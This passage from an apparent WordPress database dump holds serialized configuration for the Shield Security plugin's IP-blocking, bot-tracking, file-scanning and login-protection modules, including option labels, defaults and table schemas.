Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:12:\"Failed Login\";s:7:\"summary\";s:47:\"Detect Failed Login Attempts By Valid Usernames\";s:11:\"description\";s:61:\"Penalise a visitor who fails to login using a valid username.\";}i:10;a:11:{s:3:\"key\";s:18:\"track_logininvalid\";s:7:\"section\";s:14:\"section_logins\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:17:\"Invalid Usernames\";s:7:\"summary\";s:30:\"Detect Invalid Username Logins\";s:11:\"description\";s:67:\"Identify A Bot When It Tries To Login With A Non-Existent Username.\";}i:11;a:11:{s:3:\"key\";s:20:\"track_fakewebcrawler\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f5\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:16:\"Fake Web Crawler\";s:7:\"summary\";s:34:\"Detect Fake Search Engine Crawlers\";s:11:\"description\";s:89:\"Identify a Bot when it presents as an official web crawler, but analysis shows it\'s fake.\";}i:12;a:11:{s:3:\"key\";s:15:\"track_useragent\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fi\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:17:\"Empty User Agents\";s:7:\"summary\";s:38:\"Detect Requests With Empty User Agents\";s:11:\"description\";s:62:\"Identify a request as a bot if the user agent is not provided.\";}i:13;a:11:{s:3:\"key\";s:19:\"text_remainingtrans\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Remaining Offenses\";s:7:\"summary\";s:64:\"Visitor Triggers The IP Offenses System Through A Firewall Block\";s:11:\"description\";s:132:\"This message is displayed if the visitor triggered the IP Offenses system and reports how many offenses remain before being blocked.\";}i:14;a:5:{s:3:\"key\";s:15:\"autounblock_ips\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:15;a:5:{s:3:\"key\";s:20:\"autounblock_emailids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:5:{s:10:\"db_classes\";a:1:{s:3:\"ips\";s:62:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\IPs\\Handler\";}s:19:\"ip_lists_table_name\";s:8:\"ip_lists\";s:21:\"ip_list_table_columns\";a:6:{s:2:\"ip\";s:76:\"varchar(60) NOT NULL DEFAULT \'\' COMMENT \'Human readable IP address or range\'\";s:5:\"label\";s:54:\"varchar(255) NOT NULL DEFAULT \'\' COMMENT \'Description\'\";s:4:\"list\";s:56:\"varchar(4) NOT NULL DEFAULT \'\' COMMENT \'Block or Bypass\'\";s:3:\"ip6\";s:56:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is IPv6\'\";s:8:\"is_range\";s:57:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Is Range\'\";s:14:\"transgressions\";s:60:\"int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total Offenses\'\";}s:31:\"ip_list_table_timestamp_columns\";a:2:{s:14:\"last_access_at\";s:17:\"Last Access By IP\";s:10:\"blocked_at\";s:10:\"IP Blocked\";}s:6:\"events\";a:12:{s:14:\"custom_offense\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}s:9:\"conn_kill\";a:1:{s:3:\"cat\";i:3;}s:10:\"ip_offense\";a:1:{s:3:\"cat\";i:2;}s:10:\"ip_blocked\";a:1:{s:3:\"cat\";i:2;}s:15:\"ip_unblock_flag\";a:1:{s:3:\"cat\";i:1;}s:12:\"bottrack_404\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:23:\"bottrack_fakewebcrawler\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:19:\"bottrack_linkcheese\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:20:\"bottrack_loginfailed\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:21:\"bottrack_logininvalid\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:18:\"bottrack_useragent\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:15:\"bottrack_xmlrpc\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420379,'shield_mod_config_72163b36127e33befc92c015e6d0a73d','a:9:{s:4:\"slug\";s:12:\"hack_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:12:\"hack_protect\";s:4:\"name\";s:10:\"Hack Guard\";s:12:\"sidebar_name\";s:8:\"Scanners\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"hack_protect\";s:7:\"tagline\";s:63:\"Automatically detect and repair vulnerable and suspicious items\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:5:\"order\";i:70;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:10:\"hack_guard\";}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:5:\"Scans\";s:4:\"slug\";s:14:\"scans-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"scans-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:5:\"scans\";}}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:18:\"section_file_guard\";s:7:\"primary\";b:1;s:5:\"title\";s:10:\"File Guard\";s:11:\"title_short\";s:10:\"File Guard\";s:7:\"summary\";a:2:{i:0;s:86:\"Purpose - Monitor WordPress files and protect against malicious intrusion and hacking.\";i:1;s:56:\"Recommendation - Keep the File Guard features turned on.\";}}i:1;a:4:{s:4:\"slug\";s:16:\"section_scan_wpv\";s:5:\"title\";s:21:\"Vulnerability Scanner\";s:11:\"title_short\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Regularly scan your WordPress plugins and themes for known security vulnerabilities.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:2;a:4:{s:4:\"slug\";s:16:\"section_realtime\";s:5:\"title\";s:25:\"Realtime Change Detection\";s:11:\"title_short\";s:25:\"Realtime Change Detection\";s:7:\"summary\";a:2:{i:0;s:85:\"Purpose - Monitor Your WordPress Site For Changes To Critical Components In Realtime.\";i:1;s:59:\"Recommendation - Keep The Realtime Change Detection Active.\";}}i:3;a:4:{s:4:\"slug\";s:16:\"section_scan_ufc\";s:5:\"title\";s:26:\"Unrecognised Files Scanner\";s:11:\"title_short\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";a:2:{i:0;s:84:\"Purpose - Scan your WordPress core folders for unrecognised files that don\'t belong.\";i:1;s:71:\"Recommendation - Keep the Unrecognised Files Scanner feature turned on.\";}}i:4;a:4:{s:4:\"slug\";s:20:\"section_scan_options\";s:5:\"title\";s:12:\"Scan Options\";s:11:\"title_short\";s:12:\"Scan Options\";s:7:\"summary\";a:1:{i:0;s:54:\"Purpose - Set how often the Hack Guard scans will run.\";}}i:5;a:4:{s:4:\"slug\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:5:\"title\";s:25:\"Enable Module: Hack Guard\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Hack Guard is a set of tools to warn you and protect you against hacks on your site.\";i:1;s:54:\"Recommendation - Keep the Hack Guard module turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:19:{i:0;a:10:{s:3:\"key\";s:19:\"enable_hack_protect\";s:7:\"section\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf38\";s:9:\"link_blog\";s:19:\"https://shsec.io/9x\";s:4:\"name\";s:17:\"Enable Hack Guard\";s:7:\"summary\";s:41:\"Enable (or Disable) The Hack Guard Module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Hack Guard module\";}i:1;a:9:{s:3:\"key\";s:16:\"enabled_scan_apc\";s:7:\"section\";s:16:\"section_scan_wpv\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/ew\";s:9:\"link_blog\";s:19:\"https://shsec.io/eo\";s:4:\"name\";s:24:\"Abandoned Plugin Scanner\";s:7:\"summary\";s:35:\"Enable The Abandoned Plugin Scanner\";s:11:\"description\";s:66:\"Scan your WordPress.org assets for whether they\'ve been abandoned.\";}i:2;a:10:{s:3:\"key\";s:18:\"enable_wpvuln_scan\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/du\";s:9:\"link_blog\";s:19:\"https://shsec.io/ah\";s:4:\"name\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";s:32:\"Enable The Vulnerability Scanner\";s:11:\"description\";s:66:\"Scan all your WordPress assets for known security vulnerabilities.\";}i:3;a:10:{s:3:\"key\";s:22:\"wpvuln_scan_autoupdate\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Automatic Updates\";s:7:\"summary\";s:49:\"Apply Updates Automatically To Vulnerable Plugins\";s:11:\"description\";s:98:\"When an update becomes available, automatically apply updates to items with known vulnerabilities.\";}i:4;a:9:{s:3:\"key\";s:31:\"enable_core_file_integrity_scan\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hd\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:4:\"name\";s:20:\"WP Core File Scanner\";s:7:\"summary\";s:56:\"Automatically Scans WordPress Core Files For Alterations\";s:11:\"description\";s:145:\"Compares all WordPress core files on your site against the official WordPress files. WordPress Core files should never be altered for any reason.\";}i:5;a:10:{s:3:\"key\";s:15:\"mal_scan_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/fp\";s:9:\"link_blog\";s:19:\"https://shsec.io/fx\";s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:6;a:10:{s:3:\"key\";s:10:\"ptg_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/bl\";s:9:\"link_blog\";s:19:\"https://shsec.io/bm\";s:4:\"name\";s:20:\"Enable/Disable Guard\";s:7:\"summary\";s:43:\"Enable The Guard For Plugin And Theme Files\";s:11:\"description\";s:90:\"When enabled the Guard will automatically scan for changes to your Plugin and Theme files.\";}i:7;a:11:{s:3:\"key\";s:11:\"file_locker\";s:7:\"section\";s:16:\"section_realtime\";s:7:\"premium\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"wpconfig\";s:4:\"text\";s:9:\"WP Config\";}i:1;a:2:{s:9:\"value_key\";s:13:\"root_htaccess\";s:4:\"text\";s:14:\"Root .htaccess\";}i:2;a:2:{s:9:\"value_key\";s:10:\"root_index\";s:4:\"text\";s:14:\"Root index.php\";}i:3;a:2:{s:9:\"value_key\";s:14:\"root_webconfig\";s:4:\"text\";s:15:\"Root Web.Config\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h7\";s:9:\"link_blog\";s:19:\"https://shsec.io/h8\";s:4:\"name\";s:11:\"File Locker\";s:7:\"summary\";s:40:\"Lock Files Against Tampering and Changes\";s:11:\"description\";s:97:\"As soon as changes are detected to any selected files, the contents may be examined and reverted.\";}i:8;a:10:{s:3:\"key\";s:17:\"file_repair_areas\";s:7:\"section\";s:18:\"section_file_guard\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:2:\"wp\";i:1;s:6:\"plugin\";}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:2:\"wp\";s:4:\"text\";s:7:\"WP Core\";}i:1;a:2:{s:9:\"value_key\";s:6:\"plugin\";s:4:\"text\";s:12:\"Plugin Files\";}i:2;a:2:{s:9:\"value_key\";s:5:\"theme\";s:4:\"text\";s:11:\"Theme Files\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf36\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:4:\"name\";s:16:\"Auto File Repair\";s:7:\"summary\";s:45:\"Which Files Should Be Automatically Repaired?\";s:11:\"description\";s:80:\"When a file is modified, or malware is detected, Shield can try to repair files.\";}i:9;a:11:{s:3:\"key\";s:14:\"scan_frequency\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"1\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Once\";}i:1;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:24:\"Twice (scan every 12hrs)\";}i:2;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:25:\"3 Times (scan every 8hrs)\";}i:3;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:25:\"4 Times (scan every 6hrs)\";}i:4;a:2:{s:9:\"value_key\";s:1:\"6\";s:4:\"text\";s:25:\"6 Times (scan every 4hrs)\";}i:5;a:2:{s:9:\"value_key\";s:1:\"8\";s:4:\"text\";s:25:\"8 Times (scan every 3hrs)\";}i:6;a:2:{s:9:\"value_key\";s:2:\"12\";s:4:\"text\";s:26:\"12 Times (scan every 2hrs)\";}i:7;a:2:{s:9:\"value_key\";s:2:\"24\";s:4:\"text\";s:26:\"24 Times (scan every hour)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/b2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Scan Frequency\";s:7:\"summary\";s:60:\"Number Of Times To Automatically Scan Core Files In 24 Hours\";s:11:\"description\";s:85:\"Default: Once every 24hrs. To improve security, increase the number of scans per day.\";}i:10;a:10:{s:3:\"key\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:19:\"enabled_report_only\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:19:\"enabled_report_only\";s:4:\"text\";s:26:\"Scan Enabled - Report Only\";}i:2;a:2:{s:9:\"value_key\";s:19:\"enabled_delete_only\";s:4:\"text\";s:41:\"Scan Enabled - Automatically Delete Files\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9y\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:4:\"name\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";s:45:\"Scans Core Directories For Unrecognised Files\";s:11:\"description\";s:128:\"Scans for, and automatically deletes, any files in your core WordPress folders that are not part of your WordPress installation.\";}i:11;a:10:{s:3:\"key\";s:16:\"ufc_scan_uploads\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/he\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:4:\"name\";s:12:\"Scan Uploads\";s:7:\"summary\";s:42:\"Scan Uploads Folder For PHP and Javascript\";s:11:\"description\";s:86:\"The Uploads folder is primarily for media, but could be used to store nefarious files.\";}i:12;a:10:{s:3:\"key\";s:14:\"ufc_exclusions\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";a:9:{i:0;s:9:\"error_log\";i:1;s:13:\"php_error_log\";i:2;s:9:\".htaccess\";i:3;s:9:\".htpasswd\";i:4;s:9:\".user.ini\";i:5;s:7:\"php.ini\";i:6;s:10:\"web.config\";i:7;s:12:\"php_mail.log\";i:8;s:8:\"mail.log\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/9z\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:4:\"name\";s:15:\"File Exclusions\";s:7:\"summary\";s:52:\"Provide A List Of Files To Be Excluded From The Scan\";s:11:\"description\";s:89:\"Take a new line for each file you wish to exclude from the scan. No commas are necessary.\";}i:13;a:10:{s:3:\"key\";s:23:\"mal_autorepair_surgical\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Surgical Auto-Repair\";s:7:\"summary\";s:55:\"Automatically Attempt To Surgically Remove Malware Code\";s:11:\"description\";s:58:\"Attempts to automatically remove code from infected files.\";}i:14;a:10:{s:3:\"key\";s:19:\"ptg_reinstall_links\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/bp\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Show Re-Install Links\";s:7:\"summary\";s:33:\"Show Re-Install Links For Plugins\";s:11:\"description\";s:78:\"Show links to re-install plugins and offer re-install when activating plugins.\";}i:15;a:6:{s:3:\"key\";s:14:\"snapshot_users\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:16;a:6:{s:3:\"key\";s:14:\"scans_to_build\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:17;a:6:{s:3:\"key\";s:12:\"is_scan_cron\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:18;a:6:{s:3:\"key\";s:14:\"mal_fp_reports\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:17:{s:10:\"db_classes\";a:3:{s:12:\"file_protect\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\FileLocker\\Handler\";s:11:\"scanresults\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Scanner\\Handler\";s:5:\"scanq\";s:68:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\ScanQueue\\Handler\";}s:14:\"all_scan_slugs\";a:6:{i:0;s:3:\"apc\";i:1;s:3:\"mal\";i:2;s:3:\"ptg\";i:3;s:3:\"wpv\";i:4;s:3:\"wcf\";i:5;s:3:\"ufc\";}s:21:\"table_name_filelocker\";s:10:\"filelocker\";s:24:\"table_columns_filelocker\";a:9:{s:4:\"file\";s:61:\"varchar(256) NOT NULL COMMENT \'File Path relative to ABSPATH\'\";s:13:\"hash_original\";s:54:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Original\'\";s:12:\"hash_current\";s:53:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Current\'\";s:7:\"content\";s:22:\"blob COMMENT \'Content\'\";s:13:\"public_key_id\";s:52:\"TINYINT(2) UNSIGNED NOT NULL COMMENT \'Public Key ID\'\";s:11:\"detected_at\";s:69:\"int(15) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'TS Change Last Detected\'\";s:11:\"reverted_at\";s:67:\"int(15) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'TS Reverted To Backup\'\";s:11:\"notified_at\";s:66:\"int(15) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'TS Notification Sent\'\";s:10:\"updated_at\";s:56:\"int(15) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'TS Updated\'\";}s:18:\"table_name_scanner\";s:7:\"scanner\";s:21:\"table_columns_scanner\";a:4:{s:4:\"hash\";s:58:\"varchar(32) NOT NULL DEFAULT \'\' COMMENT \'Unique Item Hash\'\";s:4:\"meta\";s:33:\"text COMMENT \'Relevant Item Data\'\";s:4:\"scan\";s:50:\"varchar(10) NOT NULL DEFAULT 0 COMMENT \'Scan Type\'\";s:8:\"severity\";s:44:\"int(3) NOT NULL DEFAULT 1 COMMENT \'Severity\'\";}s:35:\"scanresults_table_timestamp_columns\";a:2:{s:10:\"ignored_at\";s:19:\"Scan Result Ignored\";s:11:\"notified_at\";s:21:\"Scan Notifiation Sent\";}s:20:\"table_name_scanqueue\";s:5:\"scanq\";s:23:\"table_columns_scanqueue\";a:4:{s:4:\"scan\";s:49:\"varchar(3) NOT NULL DEFAULT 0 COMMENT \'Scan Slug\'\";s:5:\"items\";s:34:\"text COMMENT \'Array of scan items\'\";s:7:\"results\";s:31:\"text COMMENT \'Array of results\'\";s:4:\"meta\";s:24:\"text COMMENT \'Meta Data\'\";}s:33:\"scanqueue_table_timestamp_columns\";a:2:{s:10:\"started_at\";s:12:\"Scan Started\";s:11:\"finished_at\";s:14:\"Scan Completed\";}s:19:\"url_mal_sigs_simple\";s:96:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_raw.txt\";s:18:\"url_mal_sigs_regex\";s:95:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_re.txt\";s:23:\"malware_whitelist_paths\";a:3:{i:0;s:18:\"wp-content/wflogs/\";i:1;s:17:\"wp-content/cache/\";i:2;s:25:\"wp-content/icwp/rollback/\";}s:14:\"cron_all_scans\";s:9:\"all-scans\";s:14:\"wcf_exclusions\";a:5:{i:0;s:11:\"readme.html\";i:1;s:11:\"license.txt\";i:2;s:16:\"licens-sv_SE.txt\";i:3;s:20:\"wp-config-sample.php\";i:4;s:11:\"wp-content/\";}s:27:\"wcf_exclusions_missing_only\";a:2:{i:0;s:20:\"wp-admin/install.php\";i:1;s:10:\"xmlrpc.php\";}s:6:\"events\";a:30:{s:14:\"apc_alert_sent\";a:0:{}s:14:\"mal_alert_sent\";a:0:{}s:14:\"ptg_alert_sent\";a:0:{}s:14:\"ufc_alert_sent\";a:0:{}s:14:\"wcf_alert_sent\";a:0:{}s:14:\"wpv_alert_sent\";a:0:{}s:12:\"apc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"mal_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ptg_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ufc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wcf_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wpv_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:14:\"apc_scan_found\";a:2:{s:3:\"cat\";i:2;s:6:\"recent\";b:1;}s:14:\"mal_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ptg_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ufc_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wcf_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wpv_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:23:\"apc_item_repair_success\";a:0:{}s:20:\"apc_item_repair_fail\";a:0:{}s:23:\"mal_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"mal_item_repair_fail\";a:0:{}s:23:\"ptg_item_repair_success\";a:0:{}s:20:\"ptg_item_repair_fail\";a:0:{}s:23:\"ufc_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"ufc_item_repair_fail\";a:0:{}s:23:\"wcf_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"wcf_item_repair_fail\";a:0:{}s:23:\"wpv_item_repair_success\";a:0:{}s:20:\"wpv_item_repair_fail\";a:0:{}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420380,'shield_mod_config_37aa160154af07c34ea6c8958d347db8','a:7:{s:4:\"slug\";s:13:\"login_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:13:\"login_protect\";s:4:\"name\";s:11:\"Login Guard\";s:12:\"sidebar_name\";s:16:\"Login Protection\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"loginprotect\";s:7:\"tagline\";s:83:\"Block brute force attacks and secure user identities with Two-Factor Authentication\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:13:\"admin_notices\";a:1:{s:23:\"email-verification-sent\";a:7:{s:2:\"id\";s:23:\"email-verification-sent\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";s:12:\"plugin_admin\";s:3:\"yes\";s:11:\"valid_admin\";b:1;}}s:8:\"sections\";a:9:{i:0;a:5:{s:4:\"slug\";s:36:\"section_brute_force_login_protection\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Brute Force Login Guard\";s:11:\"title_short\";s:11:\"Brute Force\";s:7:\"summary\";a:2:{i:0;s:87:\"Purpose - Blocks brute force hacking attacks against your login and registration 